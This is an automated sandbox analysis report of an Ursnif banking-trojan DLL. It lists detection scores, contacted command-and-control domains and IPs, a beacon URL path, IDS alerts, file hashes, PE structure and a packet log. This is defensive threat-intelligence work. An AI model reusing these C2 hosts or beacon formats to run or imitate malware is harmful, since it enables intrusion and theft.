            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

            Behavior Graph

            [Behavior graph image not reproduced. Behavior Graph ID: 448650; Sample: 945.dll; Startdate: 14/07/2021; Architecture: WINDOWS; Score: 80]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label | Link
            945.dll | 26% | Metadefender | | Browse
            945.dll | 59% | ReversingLabs | Win32.Trojan.Ursnif |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label | Link | Download
            3.2.rundll32.exe.960000.1.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
            0.2.loaddll32.exe.630000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            stivers-ricsovers.com | 3.65.154.208 | true | false | | unknown
            adpmbtj.com | 192.99.16.134 | true | false | | unknown
            ZRH-efz.ms-acdc.office.com | 52.97.201.242 | true | false | | high
            stats.l.doubleclick.net | 74.125.128.154 | true | false | | high
            redtube.com | 66.254.114.238 | true | false | | high
            vip0x055.ssl.rncdn5.com | 205.185.208.85 | true | false | | unknown
            vip0x04f.ssl.rncdn5.com | 205.185.208.79 | true | false | | unknown
            hubtraffic.com | 66.254.114.32 | true | false | | high
            outlook.com | 40.97.116.82 | true | false | | high
            ei-ph.rdtcdn.com.sds.rncdn7.com | 64.210.135.68 | true | false | | unknown
            ei.rdtcdn.com.sds.rncdn7.com | 64.210.135.70 | true | false | | unknown
            ads.trafficjunky.net | 66.254.114.38 | true | false | | high
            vuredosite.club | 37.120.222.6 | true | true | | unknown
            www.google.ch | 172.217.168.3 | true | false | | high
            vip0x08e.ssl.rncdn5.com | 205.185.208.142 | true | false | | unknown
            static.trafficjunky.com | unknown | unknown | false | | high
            www.adpmbtj.com | unknown | unknown | false | | unknown
            s2.static.cfgr3.com | unknown | unknown | false | | unknown
            www.redtube.com | unknown | unknown | false | | high
            di.rdtcdn.com | unknown | unknown | false | | high
            ei-ph.rdtcdn.com | unknown | unknown | false | | high
            cdn1d-static-shared.phncdn.com | unknown | unknown | false | | high
            outlook.office365.com | unknown | unknown | false | | high
            stats.g.doubleclick.net | unknown | unknown | false | | high
            ht.redtube.com | unknown | unknown | false | | high
            hw-cdn.trafficjunky.net | unknown | unknown | false | | high
            www.outlook.com | unknown | unknown | false | | high
            ei.rdtcdn.com | unknown | unknown | false | | high
            di-ph.rdtcdn.com | unknown | unknown | false | | high
            v.vfgte.com | unknown | unknown | false | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://outlook.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow | false | | high

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://outlook.office365.com/grower/XdjQoGbnNj_2FSimi4F/g1n0hL2Ovi8UAiji8IT8vO/AZ50N9cBD7ouh/W9Stcu | ~DF64A2AAB8E5E3DF4B.TMP.19.dr, {7370D523-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.dr | false | | high
            https://www.redtube.com/ | rundll32.exe, 00000003.00000002.490596255.0000000002CFA000.00000004.00000020.sdmp | false | | high
            https://outlook.office365.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7 | rundll32.exe, 00000003.00000003.390626600.0000000002D64000.00000004.00000001.sdmp, ~DFEA5774EEA628D538.TMP.19.dr, {7370D521-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.dr | false | | high

            Contacted IPs

            Public

            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            52.97.201.242 | ZRH-efz.ms-acdc.office.com | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            40.97.128.194 | unknown | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            52.97.232.194 | unknown | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            52.97.186.114 | unknown | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            52.98.168.178 | unknown | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            40.97.116.82 | outlook.com | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

            Private

            IP
            192.168.2.1

                                                                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 448650
Start date: 14.07.2021
Start time: 15:45:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 29s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 945.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.winDLL@18/7@34/7
EGA Information: Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 5.1% (good quality ratio 4.8%)
                                                                                • Quality average: 79.9%
                                                                                • Quality standard deviation: 28.6%
                                                                                HCA Information:
                                                                                • Successful, ratio: 57%
                                                                                • Number of executed functions: 27
                                                                                • Number of non-executed functions: 54
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .dll
                                                                                Warnings:
                                                                                • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.

                                                                                Simulations

                                                                                Behavior and APIs

Time | Type | Description
15:47:08 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs


                                                                                                              Domains


                                                                                                              ASN

                                                                                                              iKcDLx5Wxc.exeGet hashmaliciousBrowse
                                                                                                              • 104.43.139.144
                                                                                                              r6.zip.exeGet hashmaliciousBrowse
                                                                                                              • 52.239.214.132
                                                                                                              recovered_bin2Get hashmaliciousBrowse
                                                                                                              • 52.228.135.155

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7370D51F-E4F5-11EB-90E4-ECF4BB862DED}.dat
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:Microsoft Word Document
                                                                                                              Category:dropped
                                                                                                              Size (bytes):50344
                                                                                                              Entropy (8bit):2.007817288091259
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:rZZeZu2TWetyf0NMPjPxPAYMP2TBVKAu4lIg:rPKFqewRPjPxPMP2TC4F
                                                                                                              MD5:72DFFC63D7B320FF56607CACBBF2D659
                                                                                                              SHA1:9694D0EF54C82CAC4D3C55740C7C9298B725FE31
                                                                                                              SHA-256:87260A3937BAA49E596D024895EE0EADC06DF10892C4CEFAEE87B8C557233A42
                                                                                                              SHA-512:B78566E638A0FA880AB105B031320A876761CDDE77F5F77762EA39FAB72C0354162E1CCEEE53864E89B37A097BA9F08E59D33C2F6AE288D6E235AA0F749E311A
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7370D521-E4F5-11EB-90E4-ECF4BB862DED}.dat
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:Microsoft Word Document
                                                                                                              Category:dropped
                                                                                                              Size (bytes):27368
                                                                                                              Entropy (8bit):1.839005711968297
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:rWZtQd6jBSZjN2hWfMHigB96Juge/GxgB96Juge/g96ZA:rWZtQd6jkZjN2hWfMHigWlxgWuA
                                                                                                              MD5:6AB6BAE717B506BF99138EAD4712FD5D
                                                                                                              SHA1:D968B18FA142DFAD6808349EE20F52AABF8A46F5
                                                                                                              SHA-256:B60F5051287D0F98A62928ABBD2B25CA46E8FACC716BCD585C41CBE70447C925
                                                                                                              SHA-512:CD3011896E2A9477020EEA8AA7A7C3241FE51AB12F6C011F0068BAFF675CFF1A72D104631751416CAB5B4A24D297B2ADC156F94B5B30A911810AFCD132EE4F07
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7370D523-E4F5-11EB-90E4-ECF4BB862DED}.dat
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:Microsoft Word Document
                                                                                                              Category:dropped
                                                                                                              Size (bytes):27436
                                                                                                              Entropy (8bit):1.8611245040893345
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:rKZtQZ67BSijh2FW4MW+8BszVMkMPx8BszVMkMwszFCA:rKZtQZ67kijh2FW4MW+8Wzsx8WzezFCA
                                                                                                              MD5:B45BE5E0689CA52E7AA317477CEAB2EB
                                                                                                              SHA1:0D308F7400E760E9053A8DC45D37FD4746C832A8
                                                                                                              SHA-256:C205717F2E113190755FCD2A714B8D891B4045EB9DB81ECB36868D55687B5033
                                                                                                              SHA-512:F3C842EA151F324A2E582FF32F71C8B9B6B2A202D6277F3BA389AD787E9199216849F8B86554B5918114E71F3A10148B87D8103A1114B058E420D34B3DDABE2E
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):89
                                                                                                              Entropy (8bit):4.45974266689267
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:oVXUtJf0fBovpEH8JOGXnEtJf0fBovUSX+n:o9UtJsUiqEtJsUU7
                                                                                                              MD5:5AF30AB03EEB684130F909A48D6C87EC
                                                                                                              SHA1:E217A694B2C4E7EA04763EA6A99B9A577652016B
                                                                                                              SHA-256:A743A35C1772ECEAA2F22B3765935A911CA50A23156F04EFC4FBFCC42F8B9F1A
                                                                                                              SHA-512:2813B7FE1FF192128C97894DB317964A66FCB38B7E330EA6A07456BD73BD7FBDF432E9BAA4311FDE3FE0A147DB756EDC53F1C64830D10949FDAE14E38AD52A97
                                                                                                              Malicious:false
                                                                                                              Preview: [2021/07/14 15:47:24.961] Latest deploy version: ..[2021/07/14 15:47:24.961] 11.211.2 ..
                                                                                                              C:\Users\user\AppData\Local\Temp\~DF08C928D5E36F5DDB.TMP
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13237
                                                                                                              Entropy (8bit):0.5978024045945609
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:c9lLh9lLh9lIn9lIn9loMpF9loMr9lWMZofjBMjBMRyBMRTTTi:kBqoI7dhjBMjBMRyBMRvO
                                                                                                              MD5:288585C44B20EA24B2FD22E86C0AC593
                                                                                                              SHA1:D72E31BF7599CC277A793D645FECB07371B5E665
                                                                                                              SHA-256:DF52758571E4D35099BAA3057ACE9396DD2FEAA5D9B3EE51698BFF7531350701
                                                                                                              SHA-512:C277CDFDFDD901B86DAF202F718801A410E8B6B23FAFAF37282EDB242C8FFED45D31F59B77B899EB82AC0D8AC6464785A99CEAD24FADE5D13D29126DDC37B394
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Temp\~DF64A2AAB8E5E3DF4B.TMP
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):39769
                                                                                                              Entropy (8bit):0.5967894698585455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:kBqoxKAuvScS+AGcdGM8BszVMkMC8BszVMkMm8BszVMkM3:kBqoxKAuqR+AGcdGM8WzH8Wzn8Wzs
                                                                                                              MD5:2D85FE4AF6F5C992507FB76E7BDA0792
                                                                                                              SHA1:A279DE73D9632650F4D76CF2FF77FD69FAA6EE06
                                                                                                              SHA-256:90DCAC7CD40AD46F46C4EA799D12DA79C04C0D937AC1195862881314D51EC070
                                                                                                              SHA-512:9E0774C8B71744D0329ECC51355627F3E3B650A8DFDF22470BB1FA39A9A7C312CA637DA93F334FDF2DC4F639C81D0E649B34B0A89019FF2562DD5A7092660B92
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Temp\~DFEA5774EEA628D538.TMP
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):39633
                                                                                                              Entropy (8bit):0.5703763819497271
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:kBqoxKAuvScS+Z3lUX9gB96Juge/egB96Juge/+gB96Juge/3:kBqoxKAuqR+Z3lUX9gW7gW/gWk
                                                                                                              MD5:438BF405E16CD9C0230E87A245B3986D
                                                                                                              SHA1:3E253609827B74E371E078EE26FEA1E73D6DE489
                                                                                                              SHA-256:E36EBB25504C9233020CB6BBD89F01773C287628FE0BDF189F387E1DCC59E330
                                                                                                              SHA-512:C2BD4B2756B618C0EC6EC5FF881461B78C4EDEEC420699559D3773E444DC5CCC74D80B046A1CDBF830FFCFAB62355A40019A6EDAE1C05E4D3620451ED16F9B5A
                                                                                                              Malicious:false

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.657188224349107
                                                                                                              TrID:
                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:945.dll
                                                                                                              File size:381440
                                                                                                              MD5:9453981ab8e71981bea907b3f2d11395
                                                                                                              SHA1:ca0f69ef71bf287bdd19a8a9811c1f0dd2ff50e6
                                                                                                              SHA256:fa97cd35d76337ff4a523ebdd7f879359a70432a14b7377f06df29c4679b3f70
                                                                                                              SHA512:7c1dcf301adbda28a202f77d5898215ea7292ea3c1ccfa2bb8d2af97e417a1e11824c99c878694e972227d3f1038d63b5052d670b1aeb8226859a511245406c1
                                                                                                              SSDEEP:6144:vC8nRa6tXFOspzA736NZVeC8i795fubASK9beZTX3l8Eo:J0SVOspFVWi7PWoBeZTX36
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~@........................................D...................................................Rich............PE..L......S...

                                                                                                              File Icon

                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x102cd58
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x1000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x5396CBB2 [Tue Jun 10 09:11:14 2014 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:4c29865e356872ef0757b58734cbbb11

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                                              jne 00007F9BC4E898A7h
                                                                                                              call 00007F9BC4E94A8Fh
                                                                                                              push dword ptr [ebp+10h]
                                                                                                              push dword ptr [ebp+0Ch]
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E898ACh
                                                                                                              add esp, 0Ch
                                                                                                              pop ebp
                                                                                                              retn 000Ch
                                                                                                              push 0000000Ch
                                                                                                              push 010591A8h
                                                                                                              call 00007F9BC4E8FDAEh
                                                                                                              xor eax, eax
                                                                                                              inc eax
                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                              test esi, esi
                                                                                                              jne 00007F9BC4E898AEh
                                                                                                              cmp dword ptr [010F11A4h], esi
                                                                                                              je 00007F9BC4E8998Ah
                                                                                                              and dword ptr [ebp-04h], 00000000h
                                                                                                              cmp esi, 01h
                                                                                                              je 00007F9BC4E898A7h
                                                                                                              cmp esi, 02h
                                                                                                              jne 00007F9BC4E898D7h
                                                                                                              mov ecx, dword ptr [01052870h]
                                                                                                              test ecx, ecx
                                                                                                              je 00007F9BC4E898AEh
                                                                                                              push dword ptr [ebp+10h]
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call ecx
                                                                                                              mov dword ptr [ebp-1Ch], eax
                                                                                                              test eax, eax
                                                                                                              je 00007F9BC4E89957h
                                                                                                              push dword ptr [ebp+10h]
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E896B6h
                                                                                                              mov dword ptr [ebp-1Ch], eax
                                                                                                              test eax, eax
                                                                                                              je 00007F9BC4E89940h
                                                                                                              mov ebx, dword ptr [ebp+10h]
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E7E268h
                                                                                                              mov edi, eax
                                                                                                              mov dword ptr [ebp-1Ch], edi
                                                                                                              cmp esi, 01h
                                                                                                              jne 00007F9BC4E898CAh
                                                                                                              test edi, edi
                                                                                                              jne 00007F9BC4E898C6h
                                                                                                              push ebx
                                                                                                              push eax
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E7E250h
                                                                                                              push ebx
                                                                                                              push edi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E8967Ch
                                                                                                              mov eax, dword ptr [01052870h]
                                                                                                              test eax, eax
                                                                                                              je 00007F9BC4E898A9h
                                                                                                              push ebx
                                                                                                              push edi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call eax

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [EXP] VS2013 UPD3 build 30723
                                                                                                              • [LNK] VS2013 UPD3 build 30723
                                                                                                              • [ C ] VS2013 build 21005
                                                                                                              • [C++] VS2013 build 21005
                                                                                                              • [ASM] VS2013 build 21005
                                                                                                              • [C++] VS2013 UPD3 build 30723
                                                                                                              • [RES] VS2013 build 21005
                                                                                                              • [IMP] VS2008 SP1 build 30729

                                                                                                              Data Directories

                                                                                                              Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x597e0          0x80          .rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x59860          0x50          .rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0xf4000          0x1e0         .rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf5000          0x2b1c        .reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x44220          0x38          .rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x57c58          0x40          .rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT             0x44000          0x18c         .rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                              Sections

                                                                                                              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                                                              .text   0x1000           0x4211f       0x42200   False     0.619808896503   data       6.63192382314  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata  0x44000          0x16172       0x16200   False     0.578919491525   data       5.90225736165  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data   0x5b000          0x980ec       0x1c00    False     0.316824776786   data       3.9217328811   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc   0xf4000          0x1e0         0x200     False     0.529296875      data       4.724728912    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc  0xf5000          0x2b1c        0x2c00    False     0.760919744318   data       6.67218651592  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              Name         RVA      Size   Type                   Language  Country
                                                                                                              RT_MANIFEST  0xf4060  0x17d  XML 1.0 document text  English   United States

                                                                                                              Imports

                                                                                                              DLL           Import
                                                                                                              KERNEL32.dll  CreateProcessA, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GetCurrentDirectoryA, SetSystemPowerState, SetConsoleCP, SetConsoleOutputCP, GetModuleHandleA, CreateFileW, ReadConsoleW, WriteConsoleW, SetStdHandle, OutputDebugStringW, LoadLibraryExW, GetTimeZoneInformation, GetModuleFileNameA, FormatMessageA, GetSystemTimeAsFileTime, GetProcessHeap, VirtualProtect, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, HeapAlloc, RaiseException, RtlUnwind, GetCommandLineA, GetCurrentThreadId, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ExitProcess, GetModuleHandleExW, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, IsDebuggerPresent, IsValidCodePage, GetACP, GetOEMCP, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, CloseHandle, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, SetFilePointerEx, SetEnvironmentVariableA
                                                                                                              USER32.dll    GetWindowThreadProcessId, GetSysColorBrush, GetWindowRect, GetClientRect, GetForegroundWindow, CreatePopupMenu, DialogBoxIndirectParamA, CreateDialogIndirectParamA
                                                                                                              GDI32.dll     SetPixel, SelectObject, PatBlt, GetTextExtentPoint32A, StretchBlt

                                                                                                              Exports

                                                                                                              Name            Ordinal  Address
                                                                                                              Clockcondition  1        0x1021070
                                                                                                              Dogwhen         2        0x1021fa0
                                                                                                              Sing            3        0x1022080
                                                                                                              Wholegray       4        0x1022270

                                                                                                              Possible Origin

                                                                                                              Language of compilation system  Country where language is spoken
                                                                                                              English                         United States

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
                                                                                                              07/14/21-15:47:26.154158  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49731        80         192.168.2.3  40.97.116.82
                                                                                                              07/14/21-15:48:10.427089  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49749        80         192.168.2.3  37.120.222.6
                                                                                                              07/14/21-15:48:10.427089  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49749        80         192.168.2.3  37.120.222.6
                                                                                                              07/14/21-15:48:10.738630  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49752        80         192.168.2.3  37.120.222.6

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              Jul 14, 2021 15:47:27.162653923 CEST4434973652.98.168.178192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.162719965 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.162760019 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:27.344629049 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.362498045 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.362720013 CEST49733443192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:27.472296000 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.472443104 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.480575085 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.489728928 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.489845991 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.492162943 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.528579950 CEST4434973340.97.116.82192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610167980 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610224009 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610243082 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.610280037 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.610312939 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.621855974 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.621876955 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.621890068 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.621989965 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.676908970 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.676973104 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.692152977 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.805732012 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.805771112 CEST4434973940.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.805836916 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.805869102 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.822774887 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.822900057 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.823189974 CEST49738443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:27.865708113 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.865712881 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.878146887 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.878179073 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.878413916 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.879163980 CEST49740443192.168.2.352.97.232.194
